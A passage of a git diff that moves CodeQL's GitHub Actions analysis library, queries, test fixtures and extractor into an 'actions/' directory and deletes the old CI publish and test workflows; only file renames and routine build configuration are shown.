actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-367/.github/workflows/actor.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-367/.github/workflows/comment.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-367/.github/workflows/deployment1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-367/.github/workflows/deployment2.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-367/.github/workflows/label.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-367/.github/workflows/test0.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-367/.github/workflows/test1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-367/.github/workflows/test2.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-367/.github/workflows/test3.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-367/.github/workflows/test4.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-367/.github/workflows/test5.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-367/.github/workflows/test6.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-571/.github/workflows/test1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-571/.github/workflows/test2.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning82.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/dependabot1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/formal.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/formal.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/level0.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/mend.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/poc.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow-fork.yaml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller1.yaml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller2.yaml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test10.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test11.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test12.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test13.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test14.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test15.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test16.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test17.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test18.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test19.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test2.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test20.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test21.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test22.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test23.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test24.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test25.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test26.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test27.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test28.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test29.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test3.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test4.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test5.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test6.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test7.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test8.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/test9.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_5.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_6.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_3.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-918/.github/workflows/test.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-918/RequestForgery.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-918/RequestForgery.qlref (100%) rename {ql => actions/ql}/test/query-tests/SyntaxError/.github/workflows/malformed.yml (100%) rename {ql => actions/ql}/test/query-tests/SyntaxError/SyntaxError.expected (100%) rename {ql => actions/ql}/test/query-tests/SyntaxError/SyntaxError.qlref (100%) rename {ql => actions/ql}/test/query-tests/SyntaxError/options (100%) rename {ql => actions/ql}/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml (100%) rename {ql => actions/ql}/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/should_be_using_advanced_setup.yml (100%) rename {ql => actions/ql}/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.expected (100%) rename {ql => actions/ql}/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref (100%) delete mode 100644 codeql-workspace.yml diff --git a/.github/workflows/publish.yml b/.github/workflows/publish.yml deleted file mode 100644 index 67a428233e2a..000000000000 --- a/.github/workflows/publish.yml +++ /dev/null @@ -1,33 +0,0 @@ -name: Publish -on: - workflow_dispatch: - -jobs: - publish: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@v3 - - name: Fetch CodeQL - shell: bash - env: - GITHUB_TOKEN: ${{ github.token }} - run: | - gh extension install github/gh-codeql - gh codeql version - printf "CODEQL_FETCHED_CODEQL_PATH=" >> "${GITHUB_ENV}" - gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_ENV}" - gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_PATH}" - - name: Install Packs - env: - GITHUB_TOKEN: ${{ github.token }} - run: | - gh repo clone github/codeql - codeql pack install "ql/lib" - codeql pack install "ql/src" - codeql pack install "ql/test" - - name: Publish - env: - GITHUB_TOKEN: ${{ secrets.GHCR_TOKEN }} - run: | - codeql pack publish ql/lib - codeql pack publish ql/src diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml deleted file mode 100644 index 9b07d1e74785..000000000000 --- a/.github/workflows/test.yml +++ /dev/null @@ -1,37 +0,0 @@ -name: Tests -on: - push: - branches: - - master - pull_request: - workflow_dispatch: - -jobs: - tests: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@v3 - - name: Fetch CodeQL - shell: bash - env: - GITHUB_TOKEN: ${{ github.token }} - run: | - gh extension install github/gh-codeql - gh codeql set-channel "nightly" - gh codeql version - printf "CODEQL_FETCHED_CODEQL_PATH=" >> "${GITHUB_ENV}" - gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_ENV}" - gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_PATH}" - - name: Install Packs - env: - GITHUB_TOKEN: ${{ github.token }} - run: | - gh repo clone github/codeql - codeql pack ci "ql/lib" - codeql pack ci "ql/src" - codeql pack ci "ql/test" - - name: Run Tests - env: - GITHUB_TOKEN: ${{ github.token }} - run: | - codeql test run --search-path "${{ github.workspace }}/extractor" ql/test diff --git a/.gitignore b/.gitignore deleted file mode 100644 index 173a5dd5d09f..000000000000 --- a/.gitignore +++ /dev/null @@ -1,7 +0,0 @@ -.DS_Store -**/*.testproj -ql/lib/.codeql/ -ql/src/.codeql/ -ql/test/.codeql/ -db/ -.cache diff --git a/BUILD.bazel b/BUILD.bazel deleted file mode 100644 index 643d40897185..000000000000 --- a/BUILD.bazel +++ /dev/null @@ -1,20 +0,0 @@ -load("//misc/bazel:pkg.bzl", "codeql_pack") - -package(default_visibility = ["//visibility:public"]) - -[ - codeql_pack( - name = "-".join(parts), - srcs = [ - "//actions/extractor", - ], - pack_prefix = "/".join(parts), - ) - for parts in ( - [ - "experimental", - "actions", - ], - ["actions"], - ) -] diff --git a/extractor/BUILD.bazel b/actions/extractor/BUILD.bazel similarity index 100% rename from extractor/BUILD.bazel rename to actions/extractor/BUILD.bazel diff --git a/extractor/codeql-extractor.yml b/actions/extractor/codeql-extractor.yml similarity index 100% rename from extractor/codeql-extractor.yml rename to actions/extractor/codeql-extractor.yml diff --git a/extractor/tools/autobuild-impl.ps1 b/actions/extractor/tools/autobuild-impl.ps1 similarity index 100% rename from extractor/tools/autobuild-impl.ps1 rename to actions/extractor/tools/autobuild-impl.ps1 diff --git a/extractor/tools/autobuild.cmd b/actions/extractor/tools/autobuild.cmd similarity index 100% rename from extractor/tools/autobuild.cmd rename to actions/extractor/tools/autobuild.cmd diff --git a/extractor/tools/autobuild.sh b/actions/extractor/tools/autobuild.sh similarity index 100% rename from extractor/tools/autobuild.sh rename to actions/extractor/tools/autobuild.sh diff --git a/ql/lib/actions.qll b/actions/ql/lib/actions.qll similarity index 100% rename from ql/lib/actions.qll rename to actions/ql/lib/actions.qll diff --git a/ql/lib/codeql-pack.lock.yml b/actions/ql/lib/codeql-pack.lock.yml similarity index 100% rename from ql/lib/codeql-pack.lock.yml rename to actions/ql/lib/codeql-pack.lock.yml diff --git a/ql/lib/codeql/Locations.qll b/actions/ql/lib/codeql/Locations.qll similarity index 100% rename from ql/lib/codeql/Locations.qll rename to actions/ql/lib/codeql/Locations.qll diff --git a/ql/lib/codeql/actions/Ast.qll b/actions/ql/lib/codeql/actions/Ast.qll similarity index 100% rename from ql/lib/codeql/actions/Ast.qll rename to actions/ql/lib/codeql/actions/Ast.qll diff --git a/ql/lib/codeql/actions/Bash.qll b/actions/ql/lib/codeql/actions/Bash.qll similarity index 100% rename from ql/lib/codeql/actions/Bash.qll rename to actions/ql/lib/codeql/actions/Bash.qll diff --git a/ql/lib/codeql/actions/Cfg.qll b/actions/ql/lib/codeql/actions/Cfg.qll similarity index 100% rename from ql/lib/codeql/actions/Cfg.qll rename to actions/ql/lib/codeql/actions/Cfg.qll diff --git a/ql/lib/codeql/actions/Consistency.ql b/actions/ql/lib/codeql/actions/Consistency.ql similarity index 100% rename from ql/lib/codeql/actions/Consistency.ql rename to actions/ql/lib/codeql/actions/Consistency.ql diff --git a/ql/lib/codeql/actions/DataFlow.qll b/actions/ql/lib/codeql/actions/DataFlow.qll similarity index 100% rename from ql/lib/codeql/actions/DataFlow.qll rename to actions/ql/lib/codeql/actions/DataFlow.qll diff --git a/ql/lib/codeql/actions/Helper.qll b/actions/ql/lib/codeql/actions/Helper.qll similarity index 100% rename from ql/lib/codeql/actions/Helper.qll rename to actions/ql/lib/codeql/actions/Helper.qll diff --git a/ql/lib/codeql/actions/PowerShell.qll b/actions/ql/lib/codeql/actions/PowerShell.qll similarity index 100% rename from ql/lib/codeql/actions/PowerShell.qll rename to actions/ql/lib/codeql/actions/PowerShell.qll diff --git a/ql/lib/codeql/actions/TaintTracking.qll b/actions/ql/lib/codeql/actions/TaintTracking.qll similarity index 100% rename from ql/lib/codeql/actions/TaintTracking.qll rename to actions/ql/lib/codeql/actions/TaintTracking.qll diff --git a/ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll b/actions/ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll similarity index 100% rename from ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll rename to actions/ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/actions/ql/lib/codeql/actions/ast/internal/Ast.qll similarity index 100% rename from ql/lib/codeql/actions/ast/internal/Ast.qll rename to actions/ql/lib/codeql/actions/ast/internal/Ast.qll diff --git a/ql/lib/codeql/actions/ast/internal/Yaml.qll b/actions/ql/lib/codeql/actions/ast/internal/Yaml.qll similarity index 100% rename from ql/lib/codeql/actions/ast/internal/Yaml.qll rename to actions/ql/lib/codeql/actions/ast/internal/Yaml.qll diff --git a/ql/lib/codeql/actions/config/Config.qll b/actions/ql/lib/codeql/actions/config/Config.qll similarity index 100% rename from ql/lib/codeql/actions/config/Config.qll rename to actions/ql/lib/codeql/actions/config/Config.qll diff --git a/ql/lib/codeql/actions/config/ConfigExtensions.qll b/actions/ql/lib/codeql/actions/config/ConfigExtensions.qll similarity index 100% rename from ql/lib/codeql/actions/config/ConfigExtensions.qll rename to actions/ql/lib/codeql/actions/config/ConfigExtensions.qll diff --git a/ql/lib/codeql/actions/controlflow/BasicBlocks.qll b/actions/ql/lib/codeql/actions/controlflow/BasicBlocks.qll similarity index 100% rename from ql/lib/codeql/actions/controlflow/BasicBlocks.qll rename to actions/ql/lib/codeql/actions/controlflow/BasicBlocks.qll diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/actions/ql/lib/codeql/actions/controlflow/internal/Cfg.qll similarity index 100% rename from ql/lib/codeql/actions/controlflow/internal/Cfg.qll rename to actions/ql/lib/codeql/actions/controlflow/internal/Cfg.qll diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/actions/ql/lib/codeql/actions/dataflow/ExternalFlow.qll similarity index 100% rename from ql/lib/codeql/actions/dataflow/ExternalFlow.qll rename to actions/ql/lib/codeql/actions/dataflow/ExternalFlow.qll diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/actions/ql/lib/codeql/actions/dataflow/FlowSources.qll similarity index 100% rename from ql/lib/codeql/actions/dataflow/FlowSources.qll rename to actions/ql/lib/codeql/actions/dataflow/FlowSources.qll diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/actions/ql/lib/codeql/actions/dataflow/FlowSteps.qll similarity index 100% rename from ql/lib/codeql/actions/dataflow/FlowSteps.qll rename to actions/ql/lib/codeql/actions/dataflow/FlowSteps.qll diff --git a/ql/lib/codeql/actions/dataflow/TaintSteps.qll b/actions/ql/lib/codeql/actions/dataflow/TaintSteps.qll similarity index 100% rename from ql/lib/codeql/actions/dataflow/TaintSteps.qll rename to actions/ql/lib/codeql/actions/dataflow/TaintSteps.qll diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll b/actions/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll similarity index 100% rename from ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll rename to actions/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/actions/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll similarity index 100% rename from ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll rename to actions/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/actions/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll similarity index 100% rename from ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll rename to actions/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/actions/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll similarity index 100% rename from ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll rename to actions/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll diff --git a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll b/actions/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll similarity index 100% rename from ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll rename to actions/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll diff --git a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll b/actions/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll similarity index 100% rename from ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll rename to actions/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll diff --git a/ql/lib/codeql/actions/ideContextual/IDEContextual.qll b/actions/ql/lib/codeql/actions/ideContextual/IDEContextual.qll similarity index 100% rename from ql/lib/codeql/actions/ideContextual/IDEContextual.qll rename to actions/ql/lib/codeql/actions/ideContextual/IDEContextual.qll diff --git a/ql/lib/codeql/actions/ideContextual/printAst.qll b/actions/ql/lib/codeql/actions/ideContextual/printAst.qll similarity index 100% rename from ql/lib/codeql/actions/ideContextual/printAst.qll rename to actions/ql/lib/codeql/actions/ideContextual/printAst.qll diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/actions/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll similarity index 100% rename from ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll rename to actions/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/actions/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll similarity index 100% rename from ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll rename to actions/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/actions/ql/lib/codeql/actions/security/CachePoisoningQuery.qll similarity index 100% rename from ql/lib/codeql/actions/security/CachePoisoningQuery.qll rename to actions/ql/lib/codeql/actions/security/CachePoisoningQuery.qll diff --git a/ql/lib/codeql/actions/security/CodeInjectionQuery.qll b/actions/ql/lib/codeql/actions/security/CodeInjectionQuery.qll similarity index 100% rename from ql/lib/codeql/actions/security/CodeInjectionQuery.qll rename to actions/ql/lib/codeql/actions/security/CodeInjectionQuery.qll diff --git a/ql/lib/codeql/actions/security/CommandInjectionQuery.qll b/actions/ql/lib/codeql/actions/security/CommandInjectionQuery.qll similarity index 100% rename from ql/lib/codeql/actions/security/CommandInjectionQuery.qll rename to actions/ql/lib/codeql/actions/security/CommandInjectionQuery.qll diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/actions/ql/lib/codeql/actions/security/ControlChecks.qll similarity index 100% rename from ql/lib/codeql/actions/security/ControlChecks.qll rename to actions/ql/lib/codeql/actions/security/ControlChecks.qll diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/actions/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll similarity index 100% rename from ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll rename to actions/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/actions/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll similarity index 100% rename from ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll rename to actions/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/actions/ql/lib/codeql/actions/security/OutputClobberingQuery.qll similarity index 100% rename from ql/lib/codeql/actions/security/OutputClobberingQuery.qll rename to actions/ql/lib/codeql/actions/security/OutputClobberingQuery.qll diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/actions/ql/lib/codeql/actions/security/PoisonableSteps.qll similarity index 100% rename from ql/lib/codeql/actions/security/PoisonableSteps.qll rename to actions/ql/lib/codeql/actions/security/PoisonableSteps.qll diff --git a/ql/lib/codeql/actions/security/RequestForgeryQuery.qll b/actions/ql/lib/codeql/actions/security/RequestForgeryQuery.qll similarity index 100% rename from ql/lib/codeql/actions/security/RequestForgeryQuery.qll rename to actions/ql/lib/codeql/actions/security/RequestForgeryQuery.qll diff --git a/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll b/actions/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll similarity index 100% rename from ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll rename to actions/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll diff --git a/ql/lib/codeql/actions/security/SelfHostedQuery.qll b/actions/ql/lib/codeql/actions/security/SelfHostedQuery.qll similarity index 100% rename from ql/lib/codeql/actions/security/SelfHostedQuery.qll rename to 